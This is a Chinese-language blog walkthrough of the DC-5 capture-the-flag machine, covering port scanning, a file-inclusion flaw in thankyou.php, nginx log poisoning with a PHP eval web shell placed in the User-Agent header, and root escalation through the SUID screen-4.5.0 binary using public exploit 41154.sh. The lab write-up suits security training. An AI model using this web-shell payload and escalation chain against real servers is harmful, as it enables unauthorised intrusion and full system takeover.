DC-5

目录

1 信息收集

先找存活主机,确定ip后再扫全端口,开启了nfshttp服务

{"ip":"192.168.68.90","port":110,"service":"","Banner":"","url":""}
{"ip":"192.168.68.90","port":80,"service":"http","Banner":"","url":"http://192.168.68.90:80"}
{"ip":"192.168.68.90","port":111,"service":"","Banner":"","url":""}
{"ip":"192.168.68.90","port":58580,"service":"nfs","Banner":"","url":""}
{"ip":"192.168.68.90","port":25,"service":"","Banner":"","url":""}
{"url":"http://192.168.68.90:80","StatusCode":200,"Title":"Welcome","HeaderDigest":"server:nginx/1.6.2","Length":4025,"KeywordFinger":"","HashFinger":""}

看了下web,只有个表单提交功能,但这个版本的nginx有任意解析漏洞

也看了下nfs,没有注册,用不了,那只能是web了

2 再看看web

扫了下目录,也只有这几个

开Burp,挨着点一遍,看看数据包,看了半天也没看出来有啥入手点,然后在提交表单后的页面ctrl + r刷新了十几次,发现页面底部的Copyright © 2019会变,前面扫出来了footer.php,抓包看看

两个包的时间不同,猜测是根据当前时间来生成年份的

那么,thankyou.php这个页面应该是包含了footer.php ,但这个包含大概率在php里<?php do_sth(); include("footer.php"); ?>,好像也没什么用

去看了眼wp,感觉多少有点脑洞,正常业务不需要file参数来包含footer.php,那就是专门留出来的漏洞了。。。

试了下用不了伪协议,只能包含文件(日志/session),日志有UA头,所以把一句话写在UA里好一点(避免编码问题)

GET /xxx HTTP/1.1
Host: 192.168.68.90
User-Agent: <?php eval($_REQUEST[x]); ?>

蚁剑连上去,web log目录:/var/log/nginx/access.log

3 提权

先反弹个shell,蚁剑的shell太难用

看看passwd,有两个可用账号,dcroot,但后续没有找到dc能利用的点

root:x:0:0:root:/root:/bin/bash
dc:x:1000:1000:dc,,,:/home/dc:/bin/bash

LinEnum.sh看看,没有直接可利用的操作,但这里面有第三方工具screen,(这东西我以前用过,没tmux好用),之前有看到过这类软件可能会存在提权漏洞,顺着看了看

[-] SUID files:
-rwsr-xr-x 1 root root 40168 May 18  2017 /bin/su
-rwsr-xr-x 1 root root 40000 Mar 30  2015 /bin/mount
-rwsr-xr-x 1 root root 27416 Mar 30  2015 /bin/umount
-rwsr-xr-x 1 root root 1441352 Apr 19  2019 /bin/screen-4.5.0
-rwsr-xr-x 1 root root 75376 May 18  2017 /usr/bin/gpasswd
-rwsr-sr-x 1 root mail 89248 Nov 19  2017 /usr/bin/procmail
-rwsr-sr-x 1 daemon daemon 55424 Sep 30  2014 /usr/bin/at
-rwsr-xr-x 1 root root 54192 May 18  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 53616 May 18  2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 39912 May 18  2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 44464 May 18  2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 464904 Mar 25  2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 294512 Nov 22  2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10104 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 1031296 Feb 11  2018 /usr/sbin/exim4
-rwsr-xr-x 1 root root 90456 Aug 13  2014 /sbin/mount.nfs

screen -list看了下会话是空的,去搜了下screen 提权,发现存在exp,直接用searchsploit

41154.sh传到目标机器,执行

拿到flag

posted @ 2022-04-18 18:55  R3col  阅读(129)  评论(0编辑  收藏  举报